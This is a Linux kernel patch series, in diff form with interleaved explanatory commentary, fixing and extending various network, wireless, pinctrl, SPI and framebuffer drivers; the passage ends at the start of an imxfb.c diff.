+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index ed911d9946277..c236dba80ff1a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1452,8 +1452,9 @@ static int otx2_init_hw_resources(struct otx2_nic *pf)
+ 	if (err)
+ 		goto err_free_npa_lf;
+ 
+-	/* Enable backpressure */
+-	otx2_nix_config_bp(pf, true);
++	/* Enable backpressure for CGX mapped PF/VFs */
++	if (!is_otx2_lbkvf(pf->pdev))
++		otx2_nix_config_bp(pf, true);
+ 
+ 	/* Init Auras and pools used by NIX RQ, for free buffer ptrs */
+ 	err = otx2_rq_aura_pool_init(pf);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 49975924e2426..7e318133423a9 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -3425,23 +3425,6 @@ static int mtk_hw_deinit(struct mtk_eth *eth)
+ 	return 0;
+ }
+ 
+-static int __init mtk_init(struct net_device *dev)
+-{
+-	struct mtk_mac *mac = netdev_priv(dev);
+-	struct mtk_eth *eth = mac->hw;
+-	int ret;
+-
+-	ret = of_get_ethdev_address(mac->of_node, dev);
+-	if (ret) {
+-		/* If the mac address is invalid, use random mac address */
+-		eth_hw_addr_random(dev);
+-		dev_err(eth->dev, "generated random MAC address %pM\n",
+-			dev->dev_addr);
+-	}
+-
+-	return 0;
+-}
+-
+ static void mtk_uninit(struct net_device *dev)
+ {
+ 	struct mtk_mac *mac = netdev_priv(dev);
+@@ -3789,7 +3772,6 @@ static const struct ethtool_ops mtk_ethtool_ops = {
+ };
+ 
+ static const struct net_device_ops mtk_netdev_ops = {
+-	.ndo_init		= mtk_init,
+ 	.ndo_uninit		= mtk_uninit,
+ 	.ndo_open		= mtk_open,
+ 	.ndo_stop		= mtk_stop,
+@@ -3845,6 +3827,17 @@ static int mtk_add_mac(struct mtk_eth *eth, struct device_node *np)
+ 	mac->hw = eth;
+ 	mac->of_node = np;
+ 
++	err = of_get_ethdev_address(mac->of_node, eth->netdev[id]);
++	if (err == -EPROBE_DEFER)
++		return err;
++
++	if (err) {
++		/* If the mac address is invalid, use random mac address */
++		eth_hw_addr_random(eth->netdev[id]);
++		dev_err(eth->dev, "generated random MAC address %pM\n",
++			eth->netdev[id]->dev_addr);
++	}
++
+ 	memset(mac->hwlro_ip, 0, sizeof(mac->hwlro_ip));
+ 	mac->hwlro_ip_cnt = 0;
+ 
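[Editor's sketch] Moving of_get_ethdev_address() from .ndo_init into mtk_add_mac() lets the driver propagate -EPROBE_DEFER — an NVMEM-backed MAC provider may not have probed yet — instead of silently falling back to a random address. The resulting idiom, sketched with generic names:

#include <linux/etherdevice.h>
#include <linux/of_net.h>

static int example_set_mac(struct device_node *np, struct net_device *ndev)
{
	int err = of_get_ethdev_address(np, ndev);

	/* The MAC provider (e.g. an NVMEM cell) may not be ready yet;
	 * let the driver core retry the whole probe later.
	 */
	if (err == -EPROBE_DEFER)
		return err;

	if (err) {
		/* Invalid or missing address: fall back to a random one. */
		eth_hw_addr_random(ndev);
		dev_warn(&ndev->dev, "using random MAC %pM\n",
			 ndev->dev_addr);
	}
	return 0;
}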
+diff --git a/drivers/net/ethernet/ti/cpsw_ale.c b/drivers/net/ethernet/ti/cpsw_ale.c
+index 231370e9a8017..2647c18d40d95 100644
+--- a/drivers/net/ethernet/ti/cpsw_ale.c
++++ b/drivers/net/ethernet/ti/cpsw_ale.c
+@@ -106,23 +106,37 @@ struct cpsw_ale_dev_id {
+ 
+ static inline int cpsw_ale_get_field(u32 *ale_entry, u32 start, u32 bits)
+ {
+-	int idx;
++	int idx, idx2;
++	u32 hi_val = 0;
+ 
+ 	idx    = start / 32;
++	idx2 = (start + bits - 1) / 32;
++	/* Check if bits to be fetched exceed a word */
++	if (idx != idx2) {
++		idx2 = 2 - idx2; /* flip */
++		hi_val = ale_entry[idx2] << ((idx2 * 32) - start);
++	}
+ 	start -= idx * 32;
+ 	idx    = 2 - idx; /* flip */
+-	return (ale_entry[idx] >> start) & BITMASK(bits);
++	return (hi_val + (ale_entry[idx] >> start)) & BITMASK(bits);
+ }
+ 
+ static inline void cpsw_ale_set_field(u32 *ale_entry, u32 start, u32 bits,
+ 				      u32 value)
+ {
+-	int idx;
++	int idx, idx2;
+ 
+ 	value &= BITMASK(bits);
+-	idx    = start / 32;
++	idx = start / 32;
++	idx2 = (start + bits - 1) / 32;
++	/* Check if bits to be set exceed a word */
++	if (idx != idx2) {
++		idx2 = 2 - idx2; /* flip */
++		ale_entry[idx2] &= ~(BITMASK(bits + start - (idx2 * 32)));
++		ale_entry[idx2] |= (value >> ((idx2 * 32) - start));
++	}
+ 	start -= idx * 32;
+-	idx    = 2 - idx; /* flip */
++	idx = 2 - idx; /* flip */
+ 	ale_entry[idx] &= ~(BITMASK(bits) << start);
+ 	ale_entry[idx] |=  (value << start);
+ }
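[Editor's sketch] The cpsw_ale fix generalizes field access so a field may straddle two of the three 32-bit words of an ALE entry; the words are stored most-significant first, hence the "2 - idx" flip. A standalone, userspace-compilable sketch of the same read logic for a 3-word entry:

#include <stdint.h>
#include <stdio.h>

#define BITMASK(bits)	((1u << (bits)) - 1)

/* entry[0] holds bits 95..64, entry[1] bits 63..32, entry[2] bits 31..0 */
static uint32_t get_field(const uint32_t *entry, int start, int bits)
{
	int idx = start / 32;
	int idx2 = (start + bits - 1) / 32;
	uint32_t hi = 0;

	if (idx != idx2)	/* field crosses a word boundary */
		hi = entry[2 - idx2] << ((idx2 * 32) - start);
	return (hi | (entry[2 - idx] >> (start - idx * 32))) & BITMASK(bits);
}

int main(void)
{
	uint32_t e[3] = { 0, 0x00000001, 0x80000000 };

	/* 2-bit field at bit 31 spans words 2 and 1 -> prints 3 (0b11) */
	printf("%u\n", get_field(e, 31, 2));
	return 0;
}

The write side in the patch mirrors this: clear the spilled-over high bits in the neighboring word, then OR in the shifted remainder of the value.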
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 7fbb0904b3c0f..82f74f96eba29 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3252,23 +3252,30 @@ static int __init phy_init(void)
+ {
+ 	int rc;
+ 
++	ethtool_set_ethtool_phy_ops(&phy_ethtool_phy_ops);
++
+ 	rc = mdio_bus_init();
+ 	if (rc)
+-		return rc;
++		goto err_ethtool_phy_ops;
+ 
+-	ethtool_set_ethtool_phy_ops(&phy_ethtool_phy_ops);
+ 	features_init();
+ 
+ 	rc = phy_driver_register(&genphy_c45_driver, THIS_MODULE);
+ 	if (rc)
+-		goto err_c45;
++		goto err_mdio_bus;
+ 
+ 	rc = phy_driver_register(&genphy_driver, THIS_MODULE);
+-	if (rc) {
+-		phy_driver_unregister(&genphy_c45_driver);
++	if (rc)
++		goto err_c45;
++
++	return 0;
++
+ err_c45:
+-		mdio_bus_exit();
+-	}
++	phy_driver_unregister(&genphy_c45_driver);
++err_mdio_bus:
++	mdio_bus_exit();
++err_ethtool_phy_ops:
++	ethtool_set_ethtool_phy_ops(NULL);
+ 
+ 	return rc;
+ }
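[Editor's sketch] The phy_init() rework above is a textbook instance of goto-based error unwinding: each setup step gets a matching label, and the labels run in exact reverse order of the steps, so a failure at step N undoes steps N-1..1 and nothing else. A standalone skeleton of the idiom, with stub steps:

#include <stdio.h>

static int  step_a(void) { return 0; }
static int  step_b(void) { return 0; }
static int  step_c(void) { return -1; }	/* force the unwind */
static void undo_b(void) { puts("undo b"); }
static void undo_a(void) { puts("undo a"); }

static int example_init(void)
{
	int rc;

	rc = step_a();
	if (rc)
		return rc;
	rc = step_b();
	if (rc)
		goto err_a;
	rc = step_c();
	if (rc)
		goto err_b;
	return 0;

err_b:
	undo_b();	/* labels run in reverse order of setup */
err_a:
	undo_a();
	return rc;
}

int main(void) { return example_init() ? 1 : 0; }

The fix above also restores symmetry the old code lacked: ethtool_set_ethtool_phy_ops() now gains an undo on every failure path, not just some.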
+diff --git a/drivers/net/wireless/ath/ath11k/core.c b/drivers/net/wireless/ath/ath11k/core.c
+index b99180bc81723..893fefadbba96 100644
+--- a/drivers/net/wireless/ath/ath11k/core.c
++++ b/drivers/net/wireless/ath/ath11k/core.c
+@@ -870,7 +870,8 @@ int ath11k_core_check_dt(struct ath11k_base *ab)
+ }
+ 
+ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+-					   size_t name_len, bool with_variant)
++					   size_t name_len, bool with_variant,
++					   bool bus_type_mode)
+ {
+ 	/* strlen(',variant=') + strlen(ab->qmi.target.bdf_ext) */
+ 	char variant[9 + ATH11K_QMI_BDF_EXT_STR_LENGTH] = { 0 };
+@@ -881,15 +882,20 @@ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ 
+ 	switch (ab->id.bdf_search) {
+ 	case ATH11K_BDF_SEARCH_BUS_AND_BOARD:
+-		scnprintf(name, name_len,
+-			  "bus=%s,vendor=%04x,device=%04x,subsystem-vendor=%04x,subsystem-device=%04x,qmi-chip-id=%d,qmi-board-id=%d%s",
+-			  ath11k_bus_str(ab->hif.bus),
+-			  ab->id.vendor, ab->id.device,
+-			  ab->id.subsystem_vendor,
+-			  ab->id.subsystem_device,
+-			  ab->qmi.target.chip_id,
+-			  ab->qmi.target.board_id,
+-			  variant);
++		if (bus_type_mode)
++			scnprintf(name, name_len,
++				  "bus=%s",
++				  ath11k_bus_str(ab->hif.bus));
++		else
++			scnprintf(name, name_len,
++				  "bus=%s,vendor=%04x,device=%04x,subsystem-vendor=%04x,subsystem-device=%04x,qmi-chip-id=%d,qmi-board-id=%d%s",
++				  ath11k_bus_str(ab->hif.bus),
++				  ab->id.vendor, ab->id.device,
++				  ab->id.subsystem_vendor,
++				  ab->id.subsystem_device,
++				  ab->qmi.target.chip_id,
++				  ab->qmi.target.board_id,
++				  variant);
+ 		break;
+ 	default:
+ 		scnprintf(name, name_len,
+@@ -908,13 +914,19 @@ static int __ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ static int ath11k_core_create_board_name(struct ath11k_base *ab, char *name,
+ 					 size_t name_len)
+ {
+-	return __ath11k_core_create_board_name(ab, name, name_len, true);
++	return __ath11k_core_create_board_name(ab, name, name_len, true, false);
+ }
+ 
+ static int ath11k_core_create_fallback_board_name(struct ath11k_base *ab, char *name,
+ 						  size_t name_len)
+ {
+-	return __ath11k_core_create_board_name(ab, name, name_len, false);
++	return __ath11k_core_create_board_name(ab, name, name_len, false, false);
++}
++
++static int ath11k_core_create_bus_type_board_name(struct ath11k_base *ab, char *name,
++						  size_t name_len)
++{
++	return __ath11k_core_create_board_name(ab, name, name_len, false, true);
+ }
+ 
+ const struct firmware *ath11k_core_firmware_request(struct ath11k_base *ab,
+@@ -1218,7 +1230,7 @@ success:
+ 
+ int ath11k_core_fetch_regdb(struct ath11k_base *ab, struct ath11k_board_data *bd)
+ {
+-	char boardname[BOARD_NAME_SIZE];
++	char boardname[BOARD_NAME_SIZE], default_boardname[BOARD_NAME_SIZE];
+ 	int ret;
+ 
+ 	ret = ath11k_core_create_board_name(ab, boardname, BOARD_NAME_SIZE);
+@@ -1235,6 +1247,21 @@ int ath11k_core_fetch_regdb(struct ath11k_base *ab, struct ath11k_board_data *bd
+ 	if (!ret)
+ 		goto exit;
+ 
++	ret = ath11k_core_create_bus_type_board_name(ab, default_boardname,
++						     BOARD_NAME_SIZE);
++	if (ret) {
++		ath11k_dbg(ab, ATH11K_DBG_BOOT,
++			   "failed to create default board name for regdb: %d", ret);
++		goto exit;
++	}
++
++	ret = ath11k_core_fetch_board_data_api_n(ab, bd, default_boardname,
++						 ATH11K_BD_IE_REGDB,
++						 ATH11K_BD_IE_REGDB_NAME,
++						 ATH11K_BD_IE_REGDB_DATA);
++	if (!ret)
++		goto exit;
++
+ 	ret = ath11k_core_fetch_board_data_api_1(ab, bd, ATH11K_REGDB_FILE_NAME);
+ 	if (ret)
+ 		ath11k_dbg(ab, ATH11K_DBG_BOOT, "failed to fetch %s from %s\n",
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index ef7617802491e..cb77dd6ce9665 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -8715,7 +8715,7 @@ static int ath11k_mac_setup_channels_rates(struct ath11k *ar,
+ 	}
+ 
+ 	if (supported_bands & WMI_HOST_WLAN_5G_CAP) {
+-		if (reg_cap->high_5ghz_chan >= ATH11K_MAX_6G_FREQ) {
++		if (reg_cap->high_5ghz_chan >= ATH11K_MIN_6G_FREQ) {
+ 			channels = kmemdup(ath11k_6ghz_channels,
+ 					   sizeof(ath11k_6ghz_channels), GFP_KERNEL);
+ 			if (!channels) {
+@@ -9279,6 +9279,7 @@ void ath11k_mac_destroy(struct ath11k_base *ab)
+ 		if (!ar)
+ 			continue;
+ 
++		ath11k_fw_stats_free(&ar->fw_stats);
+ 		ieee80211_free_hw(ar->hw);
+ 		pdev->ar = NULL;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath11k/wmi.c b/drivers/net/wireless/ath/ath11k/wmi.c
+index fad9f8d308a20..3e0a47f4a3ebd 100644
+--- a/drivers/net/wireless/ath/ath11k/wmi.c
++++ b/drivers/net/wireless/ath/ath11k/wmi.c
+@@ -7590,6 +7590,11 @@ complete:
+ 	rcu_read_unlock();
+ 	spin_unlock_bh(&ar->data_lock);
+ 
++	/* Since the stats's pdev, vdev and beacon list are spliced and reinitialised
++	 * at this point, no need to free the individual list.
++	 */
++	return;
++
+ free:
+ 	ath11k_fw_stats_free(&stats);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index 013aca70c3d3b..6b52afcf02721 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -2738,7 +2738,7 @@ int iwl_mvm_sta_rx_agg(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 	}
+ 
+ 	if (iwl_mvm_has_new_rx_api(mvm) && start) {
+-		u16 reorder_buf_size = buf_size * sizeof(baid_data->entries[0]);
++		u32 reorder_buf_size = buf_size * sizeof(baid_data->entries[0]);
+ 
+ 		/* sparse doesn't like the __align() so don't check */
+ #ifndef __CHECKER__
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index f6872b2a0d9d0..4d4db5f6836be 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -495,6 +495,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 	{IWL_PCI_DEVICE(0x7AF0, PCI_ANY_ID, iwl_so_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x51F0, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x51F1, PCI_ANY_ID, iwl_so_long_latency_imr_trans_cfg)},
++	{IWL_PCI_DEVICE(0x51F1, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x54F0, PCI_ANY_ID, iwl_so_long_latency_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7F70, PCI_ANY_ID, iwl_so_trans_cfg)},
+ 
+@@ -543,6 +544,7 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x51F0, 0x1551, iwl9560_2ac_cfg_soc, iwl9560_killer_1550i_160_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
++	IWL_DEV_INFO(0x51F1, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+@@ -681,6 +683,8 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x2726, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
++	IWL_DEV_INFO(0x51F1, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
++	IWL_DEV_INFO(0x51F1, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index 0d81098c7b45c..da5c355405f68 100644
+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -4,7 +4,7 @@
+  * Copyright (c) 2008, Jouni Malinen <j@w1.fi>
+  * Copyright (c) 2011, Javier Lopez <jlopex@gmail.com>
+  * Copyright (c) 2016 - 2017 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2022 Intel Corporation
++ * Copyright (C) 2018 - 2023 Intel Corporation
+  */
+ 
+ /*
+@@ -1753,7 +1753,7 @@ mac80211_hwsim_select_tx_link(struct mac80211_hwsim_data *data,
+ 
+ 	WARN_ON(is_multicast_ether_addr(hdr->addr1));
+ 
+-	if (WARN_ON_ONCE(!sta->valid_links))
++	if (WARN_ON_ONCE(!sta || !sta->valid_links))
+ 		return &vif->bss_conf;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(vif->link_conf); i++) {
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index 6e93fd37ccd1a..e181c3f50f1da 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -557,7 +557,7 @@ static int __init of_platform_default_populate_init(void)
+ 			if (!of_get_property(node, "linux,opened", NULL) ||
+ 			    !of_get_property(node, "linux,boot-display", NULL))
+ 				continue;
+-			dev = of_platform_device_create(node, "of-display.0", NULL);
++			dev = of_platform_device_create(node, "of-display", NULL);
+ 			of_node_put(node);
+ 			if (WARN_ON(!dev))
+ 				return -ENOMEM;
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index ca6303fc41f98..fd11d28e5a1e4 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -246,6 +246,7 @@ static int rzg2l_map_add_config(struct pinctrl_map *map,
+ 
+ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 				   struct device_node *np,
++				   struct device_node *parent,
+ 				   struct pinctrl_map **map,
+ 				   unsigned int *num_maps,
+ 				   unsigned int *index)
+@@ -263,6 +264,7 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	struct property *prop;
+ 	int ret, gsel, fsel;
+ 	const char **pin_fn;
++	const char *name;
+ 	const char *pin;
+ 
+ 	pinmux = of_find_property(np, "pinmux", NULL);
+@@ -346,8 +348,19 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	if (parent) {
++		name = devm_kasprintf(pctrl->dev, GFP_KERNEL, "%pOFn.%pOFn",
++				      parent, np);
++		if (!name) {
++			ret = -ENOMEM;
++			goto done;
++		}
++	} else {
++		name = np->name;
++	}
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+-	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, num_pinmux, NULL);
++	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+ 		goto done;
+@@ -357,17 +370,16 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	 * Register a single group function where the 'data' is an array PSEL
+ 	 * register values read from DT.
+ 	 */
+-	pin_fn[0] = np->name;
+-	fsel = pinmux_generic_add_function(pctldev, np->name, pin_fn, 1,
+-					   psel_val);
++	pin_fn[0] = name;
++	fsel = pinmux_generic_add_function(pctldev, name, pin_fn, 1, psel_val);
+ 	if (fsel < 0) {
+ 		ret = fsel;
+ 		goto remove_group;
+ 	}
+ 
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+-	maps[idx].data.mux.group = np->name;
+-	maps[idx].data.mux.function = np->name;
++	maps[idx].data.mux.group = name;
++	maps[idx].data.mux.function = name;
+ 	idx++;
+ 
+ 	dev_dbg(pctrl->dev, "Parsed %pOF with %d pins\n", np, num_pinmux);
+@@ -414,7 +426,7 @@ static int rzg2l_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	index = 0;
+ 
+ 	for_each_child_of_node(np, child) {
+-		ret = rzg2l_dt_subnode_to_map(pctldev, child, map,
++		ret = rzg2l_dt_subnode_to_map(pctldev, child, np, map,
+ 					      num_maps, &index);
+ 		if (ret < 0) {
+ 			of_node_put(child);
+@@ -423,7 +435,7 @@ static int rzg2l_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	}
+ 
+ 	if (*num_maps == 0) {
+-		ret = rzg2l_dt_subnode_to_map(pctldev, np, map,
++		ret = rzg2l_dt_subnode_to_map(pctldev, np, NULL, map,
+ 					      num_maps, &index);
+ 		if (ret < 0)
+ 			goto done;
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzv2m.c b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+index e8c18198bebd2..35f382b055e83 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzv2m.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+@@ -207,6 +207,7 @@ static int rzv2m_map_add_config(struct pinctrl_map *map,
+ 
+ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 				   struct device_node *np,
++				   struct device_node *parent,
+ 				   struct pinctrl_map **map,
+ 				   unsigned int *num_maps,
+ 				   unsigned int *index)
+@@ -224,6 +225,7 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	struct property *prop;
+ 	int ret, gsel, fsel;
+ 	const char **pin_fn;
++	const char *name;
+ 	const char *pin;
+ 
+ 	pinmux = of_find_property(np, "pinmux", NULL);
+@@ -307,8 +309,19 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	if (parent) {
++		name = devm_kasprintf(pctrl->dev, GFP_KERNEL, "%pOFn.%pOFn",
++				      parent, np);
++		if (!name) {
++			ret = -ENOMEM;
++			goto done;
++		}
++	} else {
++		name = np->name;
++	}
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+-	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, num_pinmux, NULL);
++	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+ 		goto done;
+@@ -318,17 +331,16 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	 * Register a single group function where the 'data' is an array PSEL
+ 	 * register values read from DT.
+ 	 */
+-	pin_fn[0] = np->name;
+-	fsel = pinmux_generic_add_function(pctldev, np->name, pin_fn, 1,
+-					   psel_val);
++	pin_fn[0] = name;
++	fsel = pinmux_generic_add_function(pctldev, name, pin_fn, 1, psel_val);
+ 	if (fsel < 0) {
+ 		ret = fsel;
+ 		goto remove_group;
+ 	}
+ 
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+-	maps[idx].data.mux.group = np->name;
+-	maps[idx].data.mux.function = np->name;
++	maps[idx].data.mux.group = name;
++	maps[idx].data.mux.function = name;
+ 	idx++;
+ 
+ 	dev_dbg(pctrl->dev, "Parsed %pOF with %d pins\n", np, num_pinmux);
+@@ -375,7 +387,7 @@ static int rzv2m_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	index = 0;
+ 
+ 	for_each_child_of_node(np, child) {
+-		ret = rzv2m_dt_subnode_to_map(pctldev, child, map,
++		ret = rzv2m_dt_subnode_to_map(pctldev, child, np, map,
+ 					      num_maps, &index);
+ 		if (ret < 0) {
+ 			of_node_put(child);
+@@ -384,7 +396,7 @@ static int rzv2m_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	}
+ 
+ 	if (*num_maps == 0) {
+-		ret = rzv2m_dt_subnode_to_map(pctldev, np, map,
++		ret = rzv2m_dt_subnode_to_map(pctldev, np, NULL, map,
+ 					      num_maps, &index);
+ 		if (ret < 0)
+ 			goto done;
+diff --git a/drivers/spi/spi-bcm63xx.c b/drivers/spi/spi-bcm63xx.c
+index 80fa0ef8909ca..147199002df1e 100644
+--- a/drivers/spi/spi-bcm63xx.c
++++ b/drivers/spi/spi-bcm63xx.c
+@@ -126,7 +126,7 @@ enum bcm63xx_regs_spi {
+ 	SPI_MSG_DATA_SIZE,
+ };
+ 
+-#define BCM63XX_SPI_MAX_PREPEND		15
++#define BCM63XX_SPI_MAX_PREPEND		7
+ 
+ #define BCM63XX_SPI_MAX_CS		8
+ #define BCM63XX_SPI_BUS_NUM		0
+diff --git a/drivers/spi/spi-dw-mmio.c b/drivers/spi/spi-dw-mmio.c
+index 26c40ea6dd129..8046e9138881b 100644
+--- a/drivers/spi/spi-dw-mmio.c
++++ b/drivers/spi/spi-dw-mmio.c
+@@ -222,6 +222,24 @@ static int dw_spi_intel_init(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
++/*
++ * DMA-based mem ops are not configured for this device and are not tested.
++ */
++static int dw_spi_mountevans_imc_init(struct platform_device *pdev,
++				      struct dw_spi_mmio *dwsmmio)
++{
++	/*
++	 * The Intel Mount Evans SoC's Integrated Management Complex DW
++	 * apb_ssi_v4.02a controller has an errata where a full TX FIFO can
++	 * result in data corruption. The suggested workaround is to never
++	 * completely fill the FIFO. The TX FIFO has a size of 32 so the
++	 * fifo_len is set to 31.
++	 */
++	dwsmmio->dws.fifo_len = 31;
++
++	return 0;
++}
++
+ static int dw_spi_canaan_k210_init(struct platform_device *pdev,
+ 				   struct dw_spi_mmio *dwsmmio)
+ {
+@@ -350,6 +368,10 @@ static const struct of_device_id dw_spi_mmio_of_match[] = {
+ 	{ .compatible = "snps,dwc-ssi-1.01a", .data = dw_spi_hssi_init},
+ 	{ .compatible = "intel,keembay-ssi", .data = dw_spi_intel_init},
+ 	{ .compatible = "intel,thunderbay-ssi", .data = dw_spi_intel_init},
++	{
++		.compatible = "intel,mountevans-imc-ssi",
++		.data = dw_spi_mountevans_imc_init,
++	},
+ 	{ .compatible = "microchip,sparx5-spi", dw_spi_mscc_sparx5_init},
+ 	{ .compatible = "canaan,k210-spi", dw_spi_canaan_k210_init},
+ 	{ /* end of table */}
+diff --git a/drivers/spi/spi-s3c64xx.c b/drivers/spi/spi-s3c64xx.c
+index 71d324ec9a70a..1480df7b43b3f 100644
+--- a/drivers/spi/spi-s3c64xx.c
++++ b/drivers/spi/spi-s3c64xx.c
+@@ -668,6 +668,8 @@ static int s3c64xx_spi_config(struct s3c64xx_spi_driver_data *sdd)
+ 
+ 	if ((sdd->cur_mode & SPI_LOOP) && sdd->port_conf->has_loopback)
+ 		val |= S3C64XX_SPI_MODE_SELF_LOOPBACK;
++	else
++		val &= ~S3C64XX_SPI_MODE_SELF_LOOPBACK;
+ 
+ 	writel(val, regs + S3C64XX_SPI_MODE_CFG);
+ 
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index b6b22fa4a8a01..fd3ff398d234a 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1732,6 +1732,9 @@ static int au1200fb_drv_probe(struct platform_device *dev)
+ 
+ 	/* Now hook interrupt too */
+ 	irq = platform_get_irq(dev, 0);
++	if (irq < 0)
++		return irq;
++
+ 	ret = request_irq(irq, au1200fb_handle_irq,
+ 			  IRQF_SHARED, "lcd", (void *)dev);
+ 	if (ret) {
+diff --git a/drivers/video/fbdev/imxfb.c b/drivers/video/fbdev/imxfb.c
+index 51fde1b2a7938..36ada87b49a49 100644
+--- a/drivers/video/fbdev/imxfb.c
++++ b/drivers/video/fbdev/imxfb.c
